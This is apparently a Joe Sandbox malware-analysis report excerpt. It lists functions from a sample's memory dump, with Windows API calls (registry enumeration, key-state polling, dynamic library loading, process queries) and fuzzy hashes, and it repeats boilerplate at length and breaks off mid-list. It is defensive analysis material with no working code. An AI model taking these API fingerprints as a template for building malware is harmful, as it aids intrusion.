Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 689ebcef67f34e41f63d4dea844714419860c641df868dbdbd743233e5a63c34
Instruction ID: 77e5eff153e62249342b8bdde2e43a07e1381a2e1dbe9403c2fbadcb48eee611
Opcode Fuzzy Hash: 689ebcef67f34e41f63d4dea844714419860c641df868dbdbd743233e5a63c34
Instruction Fuzzy Hash: 942179B1200245ABEF148F64DC84FBA77ADEF58728F10862DFA1092190D739DE41A760

Function 007A6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 007A6DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007A6DEF
GetStdHandle.KERNEL32(0000000C), ref: 007A6E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007A6E3B

Strings

nul, xrefs: 007A6E36

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 9917d4e02405e605f4dc4013c18aac528159d051300e406ccd1127d593a33195
Instruction ID: aee945efe5d7a5397328051c3c9454680bd676469cead435c530db8825d8a40f
Opcode Fuzzy Hash: 9917d4e02405e605f4dc4013c18aac528159d051300e406ccd1127d593a33195
Instruction Fuzzy Hash: 4F218175700209ABDF209F39DC04A9A77A5FF86760F244719FDA0D72D0D77499508B64

Function 007A6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 007A6E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007A6EBB
GetStdHandle.KERNEL32(000000F6), ref: 007A6ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007A6F06

Strings

nul, xrefs: 007A6F01

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: b7ee291edc8086d2e13f8d6c1966c33900a66e706415d74c89e7f5637aba7196
Instruction ID: 6ef4d76167ef44fbee4fb7809a7807a2ed5e7fe8a2574b1e4b40c51c56712ea7
Opcode Fuzzy Hash: b7ee291edc8086d2e13f8d6c1966c33900a66e706415d74c89e7f5637aba7196
Instruction Fuzzy Hash: 8E21A4B9504305EBDB209F69DC04A9AB7A8FF86730F284B19FDA0D72D0E774A850C761

Function 007AAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007AAC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007AACA8
__swprintf.LIBCMT ref: 007AACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,007CF910), ref: 007AACFF

Strings

%lu, xrefs: 007AACBB

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: b602b34671a8022e06a8aef5ab2145acf25ce817fa957eef4a16640cdb9ae7d0
Instruction ID: 56b716290a073326e95bb831092ae3db0b3e6b10dce589220beb735e6751faa7
Opcode Fuzzy Hash: b602b34671a8022e06a8aef5ab2145acf25ce817fa957eef4a16640cdb9ae7d0
Instruction Fuzzy Hash: DC214171A00109EFCB10DF65CD49DAF7BB9EF89714B008469F909DB252DB35EA41CB61

Function 007A1142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0079FCED,?,007A0D40,?,00008000), ref: 007A115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,0079FCED,?,007A0D40,?,00008000), ref: 007A1184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0079FCED,?,007A0D40,?,00008000), ref: 007A118E
Sleep.KERNEL32(?,?,?,?,?,?,?,0079FCED,?,007A0D40,?,00008000), ref: 007A11C1

Strings

@z, xrefs: 007A119D

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID: @z
API String ID: 2875609808-2326115005
Opcode ID: c9ae175a6975231ae4c375a6d2dc96f5cad93a10eca59f944edc606ffc28b9b2
Instruction ID: 78816b3567861ffd10ca1835f260a0381fa1b0e960115b2a5932674d96b961cc
Opcode Fuzzy Hash: c9ae175a6975231ae4c375a6d2dc96f5cad93a10eca59f944edc606ffc28b9b2
Instruction Fuzzy Hash: A0115E35D0051DDBDF00DFA5D848AEEBBB8FF4A711F85815AEA81B2240CB789960CBD5

Function 007BEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007BEC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 007BEC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007BED6A
CloseHandle.KERNEL32(?), ref: 007BEDEB

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 5ad14708a1c02a6b19c5cb5dc130f51a646d9fab7d76bf0c92ead5f6b463d5eb
Instruction ID: 4fc043ec699d8c84932d3b0703661f13eebf6ef8a1522d052d263bde2ee4a888
Opcode Fuzzy Hash: 5ad14708a1c02a6b19c5cb5dc130f51a646d9fab7d76bf0c92ead5f6b463d5eb
Instruction Fuzzy Hash: 118140716007009FD760EF28C84AF6AB7E5AF48710F14891DF9599B392D7B4AC40CB91

Function 007C0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00747DE1: _memmove.LIBCMT ref: 00747E22

Part of subcall function 007C0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007BFDAD,?,?), ref: 007C0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C00FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007C013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007C0183
RegCloseKey.ADVAPI32(?,?), ref: 007C01AF
RegCloseKey.ADVAPI32(00000000), ref: 007C01BC

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: aed76ca645bf5dcd4aeca6e03018886946ac4db60f0f489497721e4404c6cf24
Instruction ID: e969214fd33f69a009e27572f1e641ac32a239a85bd4e30b717b3258ec740243
Opcode Fuzzy Hash: aed76ca645bf5dcd4aeca6e03018886946ac4db60f0f489497721e4404c6cf24
Instruction Fuzzy Hash: 5F514771208204EFC714EF68C885F6EB7E9BF84714F44892DF595872A2DB39E944CB92

Function 007BD8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00749837: __itow.LIBCMT ref: 00749862
Part of subcall function 00749837: __swprintf.LIBCMT ref: 007498AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007BD927
GetProcAddress.KERNEL32(00000000,?), ref: 007BD9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 007BD9C6
GetProcAddress.KERNEL32(00000000,?), ref: 007BDA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007BDA21

Part of subcall function 00745A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007A7896,?,?,00000000), ref: 00745A2C
Part of subcall function 00745A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007A7896,?,?,00000000,?,?), ref: 00745A50

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 1ac96d1778b47fc12b672e20059f716eab24daf522e0953cc7430d2b9c0d1623
Instruction ID: ba7ffe5be6854ec5a67e1e6582b9967d28917d56855848d93d502ff6c6c856ce
Opcode Fuzzy Hash: 1ac96d1778b47fc12b672e20059f716eab24daf522e0953cc7430d2b9c0d1623
Instruction Fuzzy Hash: 52510975A00209DFCB10EFA8C488AADB7B5FF09320B14C069E955AB312DB39AD45CF91

Function 007AE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007AE61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007AE648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007AE687

Part of subcall function 00749837: __itow.LIBCMT ref: 00749862
Part of subcall function 00749837: __swprintf.LIBCMT ref: 007498AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007AE6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007AE6B4

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: c39e29339fca808bd618d2d2c8061442b66441ed28ed6ff2bdeac74fb52a5ad3
Instruction ID: 2482fc395332f7661ba15c164bf11c2914c9a93554807d5048edfa2ed39eea4a
Opcode Fuzzy Hash: c39e29339fca808bd618d2d2c8061442b66441ed28ed6ff2bdeac74fb52a5ad3
Instruction Fuzzy Hash: FC511A35A00205DFCB11EF64C985AAEBBF5FF49314B1484A9E909AB362CB39ED11DF50

Function 00742344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00742357
ScreenToClient.USER32(008057B0,?), ref: 00742374
GetAsyncKeyState.USER32(00000001), ref: 00742399
GetAsyncKeyState.USER32(00000002), ref: 007423A7

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: a3c617f62dd14c4737a93d91daf3f192e633c30b7c00f1f9bdee8d210c1bb783
Instruction ID: 969b8e88569135e172956dfd6a38f66df39edf7ac43df6c27ba2a69007941567
Opcode Fuzzy Hash: a3c617f62dd14c4737a93d91daf3f192e633c30b7c00f1f9bdee8d210c1bb783
Instruction Fuzzy Hash: 32418F35604109FBDF158F68CC48FE9BB75FB09360F60835EF828962A1C73899A0DB90

Function 007963AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007963E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00796433
TranslateMessage.USER32(?), ref: 0079645C
DispatchMessageW.USER32(?), ref: 00796466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00796475

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 2663decd51f5e27eda611627c54ca1c2af5146520d747e3415d87a883e3ab6b7
Instruction ID: 882ddbaf0077eea6950d44e040711627d6ac41d35845d310d34e81d23d988af2
Opcode Fuzzy Hash: 2663decd51f5e27eda611627c54ca1c2af5146520d747e3415d87a883e3ab6b7
Instruction Fuzzy Hash: 81319271900686AFDF648FF0AC44FB77BA8BF01300F144269E525C61B1E72D9585DB61

Function 00798A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00798A30
PostMessageW.USER32(?,00000201,00000001), ref: 00798ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00798AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00798AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00798AF8

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 5a2ca293252baa8c49d9e0e3229a8242e05c884d8d6f33e8b6fe4d98d40ace50
Instruction ID: ec7515b9894260403b74124cf2e6840fce0fcaaa560a8a56ddf92913b3c198eb
Opcode Fuzzy Hash: 5a2ca293252baa8c49d9e0e3229a8242e05c884d8d6f33e8b6fe4d98d40ace50
Instruction Fuzzy Hash: 4B31C071500219EBDF14CFA8ED4CA9E3BB5EB05315F10822AF925EB2D0C7B89D14DB91

Function 007CB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

GetWindowLongW.USER32(?,000000F0), ref: 007CB192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007CB1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007CB1CF
GetSystemMetrics.USER32(00000004), ref: 007CB1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007B0E90,00000000), ref: 007CB216

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 35c22b9d0331f303214869689ce198fe24594fff1a908b2d785daf368b1351f4
Instruction ID: 76391f58ddbba08f55b3d679a34efa2718829876e6d14417669e93497d1c1e2d
Opcode Fuzzy Hash: 35c22b9d0331f303214869689ce198fe24594fff1a908b2d785daf368b1351f4
Instruction Fuzzy Hash: CB215C71A20665AFCB109F389C19F6A3BA5FB05361F15863DF922D71E0E73499209B90

Function 007B5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 007B5A6E
GetForegroundWindow.USER32 ref: 007B5A85
GetDC.USER32(00000000), ref: 007B5AC1
GetPixel.GDI32(00000000,?,00000003), ref: 007B5ACD
ReleaseDC.USER32(00000000,00000003), ref: 007B5B08

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 9e6686d947220c3004136b0fa430ae626442b36d6c947af8e8a58f3bc964803b
Instruction ID: 2f7e7162ba2713e7596488e881320eb6bdef732523c50b09344813e29dff43ab
Opcode Fuzzy Hash: 9e6686d947220c3004136b0fa430ae626442b36d6c947af8e8a58f3bc964803b
Instruction Fuzzy Hash: C2216F75A00204EFD714EFA5DC88A9ABBE5EF48310F14C579F94997362DB38AD00CB91

Function 007412F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0074134D
SelectObject.GDI32(?,00000000), ref: 0074135C
BeginPath.GDI32(?), ref: 00741373
SelectObject.GDI32(?,00000000), ref: 0074139C

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: c7c14824e2aad343b5c1152476a12660a42c7dfa44c911df0cbee609279b1fc5
Instruction ID: 427a3d3dfc3de9943c2e1d1d4f69431a450f90c4736440c032faf1c7075276ff
Opcode Fuzzy Hash: c7c14824e2aad343b5c1152476a12660a42c7dfa44c911df0cbee609279b1fc5
Instruction Fuzzy Hash: 39213D30900608EFDB11AF25DD48B6B7BE9FB00761F54C22AF814965B0D77999D1DFA0

Function 007A4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 007A4ABA
__beginthreadex.LIBCMT ref: 007A4AD8
MessageBoxW.USER32(?,?,?,?), ref: 007A4AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007A4B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007A4B0A

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
